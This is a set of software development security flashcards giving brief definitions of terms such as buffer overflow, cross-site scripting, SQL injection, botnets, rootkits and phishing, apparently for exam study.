Software Development Security Flashcards
Adware
Software to generate ads that installs itself on your computer when you download some other (usually free) program from the web.
Aggregation
A relation, such as CONSISTS OF or CONTAINS, between types that defines the composition of a type from other types.
Application Programming Interface (API)
A set of calling conventions defining how a service is invoked through a software package.
Botnets
A network of infected zombie computers controlled by a botherder. Botnets range in size from a just handful of infected computers to hundreds of thousands or millions. Also known as botherd.
Buffer overflow
An anomaly where a program, while writing data to a buffer, overruns the buffer’s boundary and ovewrites adjacent memory. This is a special case of violation of memory safety.
Cookie poisoning (manipulation)
Attacks involving the modification of the contents of a cookie in order to bypass security mechanisms.
Covert channel
A channel of communication within a computer system, or network, that is not designed or intended to transfer information.
Cross Site Request Forgeries (CSRF)
A type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts.
Cross-Site Scripting (XSS)
A type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages viewed by other users.
Dangling pointer
Pointers that do not point to a valid object of the appropriate type.
Data hiding
A software development technique specifically used in object-oriented programming (OOP) to hide internal object details (data members). Data hiding ensures exclusive data access to class members and protects object integrity by preventing unintended or intended changes.
Denial of Service (DoS)
The unauthorized prevention of authorized access to resources or the delaying of time-critical operations.
Distributed Denial of Service (DDoS)
Multiple computers flooding a Web site with so many requests for service that it slows down or crashes.
Fast flux botnets
A DNS technique used by botnets to hide phising and malware delivery sites behind an ever-changing network of compromised hosts acting as proxies.
Garbage collection
A language mechanism that automatically deallocates memory for objects that are not accessible or referenced.
HTTP Response Splitting
A form of web application vulnerability, resulting from the failure of the application or its environment to properly sanitize input values. It can be used to perform cross-site scripting attacks, cross-user defacement, web cache poisoning, and similar exploits.
Keystroke logging
The action of recording (or logging) the keys struck on a keyboard, typically in a covert manner so that the person using the keyboard is unaware that their actions are being monitored.
Open source
A philosophy that promotes free redistribution and access to an end product’s design and implementation details.
Pharming
An attack intended to redirect a website’s traffic to another, bogus site.
Phishing
The act of attempting to acquire information such as usernames, passwords, and credit card details (and sometimes, indirectly money) by masquerading as a trustworthy entity in an electronic communication.
Race condition
A type of flaw in an electronic or software system where the output is dependent on the sequence or timing of other uncontrollable events.
Remote Access Trojans (RATs)
A malware program that includes a back door for administrative control over the target computer.
Rootkits
A stealthy type of software, often malicious, designed to hide the existence of certain processes or programs from normal methods of detection and enable continued privileged access to a computer.
Social engineering
The art of manipulating people into performing actions or divulging confidential information.
SPAM
The use of electronic messaging systems to send unsolicited bulk messages, especially advertising, indiscriminately.
Spear phishing
Phishing attempts directed at specific individuals or companies. Attackers may gather personal information about their target to increase their probability of success.
SQL injection
A technique often used to attack data driven applications. This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g. dump the database contents to the attacker).
URL manipulation
By manipulating certain parts of a URL, a hacker can get a web server to deliver web pages he is not supposed to have access to.
Web applets
Provide interactive features to web applications that cannot be provided by HTML alone. They can capture mouse input and also have controls like buttons or check boxes. In response to the user action an applet can change the provided graphic content.